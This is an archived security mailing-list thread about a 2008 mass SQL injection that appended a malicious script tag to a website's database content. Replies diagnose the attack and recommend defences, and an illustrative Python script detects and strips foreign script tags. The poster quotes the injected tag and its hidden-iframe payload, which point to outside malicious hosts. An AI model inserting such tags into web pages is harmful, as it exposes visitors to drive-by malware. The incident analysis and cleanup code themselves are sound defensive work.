Incidents
Mysterious JavaScript appearance in website database Apr 14 2008 11:03PM
Glenn Gillis (glenn elaw org test-google-a com) (3 replies)
Re: Mysterious JavaScript appearance in website database Apr 15 2008 07:26AM
Bojan Zdrnja (bojan zdrnja gmail com) (1 replies)
Re: Mysterious JavaScript appearance in website database Apr 15 2008 07:20PM
Glenn Gillis (glenn elaw org test-google-a com)
Re: Mysterious JavaScript appearance in website database Apr 15 2008 05:56AM
Bob Cunningham (bob cdsinc com)
Re: Mysterious JavaScript appearance in website database Apr 14 2008 11:53PM
Jon Oberheide (jon oberheide org) (1 replies)
Re: Mysterious JavaScript appearance in website database Apr 15 2008 04:49PM
Yuli Stremovsky (stremovsky gmail com)
I can advise you to update your CMS system including all plugins and
install an SQL firewall.
You can use the GreenSQL db firewall to protect a MySQL server from SQL
injection attacks.

http://www.greensql.net/

Best regards,
Yuli

On Tue, Apr 15, 2008 at 2:53 AM, Jon Oberheide <jon (at) oberheide (dot) org> wrote:
> Looks like an SQL injection attack.
>
> Take a look in your MS-SQL database at the affected entries and I bet
> you'll see the nmidahena reference.
>
> Since this is a widespread, automated attack that has affected other
> sites, it's unlikely it was targeted at your specific organization or
> custom CMS. Give your codebase a thorough audit for SQL injection
> vectors.
>
> Regards,
> Jon Oberheide
>
>
>
>
> On Mon, 2008-04-14 at 16:03 -0700, Glenn Gillis wrote:
> > On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
> > U.S.-based NGO I work for mysteriously had a JavaScript URL appended to
> > the titles of much of the content on our website:
> >
> > <script src=http://www.nihaorr1.com/1.js></script>
> >
> > NB: the last modified dates for all of the content containing a
> > reference to this script are identical, right down to the 1/100 second.
> >
> > The contents of the script apparently attempt to open an iframe to a
> > non-existent domain, "nmidahena.com":
> >
> > document.writeln("<iframe width=\'10\' height=\'1\'
> > src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");
> >
> > I haven't found any reports of a new worm, etc. that might account for
> > this, but when I Google "nmidahena.com" I get over 100,000 hits for
> > other sites on which this script is present.
> >
> > We are running a custom-developed CMS with MS-SQL Server 2000 as the
> > backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT
> > Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes
> > released prior to NT4's end-of-life declaration by MS, for what it's worth.)
> >
> > Anyone have an idea what might have caused this?
> --
> Jon Oberheide <jon (at) oberheide (dot) org>
> GnuPG Key: 1024D/F47C17FE
> Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE
>

--
http://www.kyplex.com/
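
A triage sketch for the incident described in this thread, added here as an example and not code from any of the posters: it scans exported title values for `<script>` tags that load from hosts outside the site, strips them, and groups the affected rows by last-modified timestamp, which the original report notes was identical across all injected content. The row layout, `triage`, `OWN_HOSTS` and the sample rows are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# <script> element with a src attribute, quoted or unquoted, any case.
SCRIPT_RE = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*[\"']?([^\s\"'>]+)[^>]*>\s*</script\s*>",
    re.IGNORECASE,
)

OWN_HOSTS = {"www.example.org"}  # assumption: hosts the site legitimately loads from

# Constructed sample rows: (row_id, title, last_modified). The injected tag is
# the one quoted in the thread; everything else is made up.
SAMPLE_ROWS = [
    (1, "Annual report<script src=http://www.nihaorr1.com/1.js></script>",
     "2008-04-13 01:07:38.030"),
    (2, "Contact us", "2008-03-02 10:15:00.000"),
    (3, 'Events <script src="/js/cal.js"></script>', "2008-02-11 09:00:00.000"),
    (4, "Press room<SCRIPT SRC=http://www.nihaorr1.com/1.js></SCRIPT>",
     "2008-04-13 01:07:38.030"),
]

def triage(rows, own_hosts):
    """Return (findings, cleaned, clusters) for rows carrying foreign script tags."""
    findings, cleaned, clusters = [], {}, defaultdict(list)
    for row_id, title, modified in rows:
        foreign = []

        def strip_foreign(match):
            host = (urlparse(match.group(1)).hostname or "").lower()
            if host and host not in own_hosts:
                foreign.append(host)
                return ""            # drop the injected element
            return match.group(0)    # relative or first-party script: keep

        new_title = SCRIPT_RE.sub(strip_foreign, title)
        if foreign:
            findings.append((row_id, foreign))
            cleaned[row_id] = new_title.rstrip()
            clusters[modified].append(row_id)  # same timestamp => one batch write
    return findings, cleaned, dict(clusters)

if __name__ == "__main__":
    found, fixed, batches = triage(SAMPLE_ROWS, OWN_HOSTS)
    for row_id, hosts in found:
        print(row_id, hosts, "->", repr(fixed[row_id]))
    print(batches)
```

Stripping the tags only repairs the stored data; the injection point in the CMS still has to be found and closed, as the thread advises.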

Copyright 2010, SecurityFocus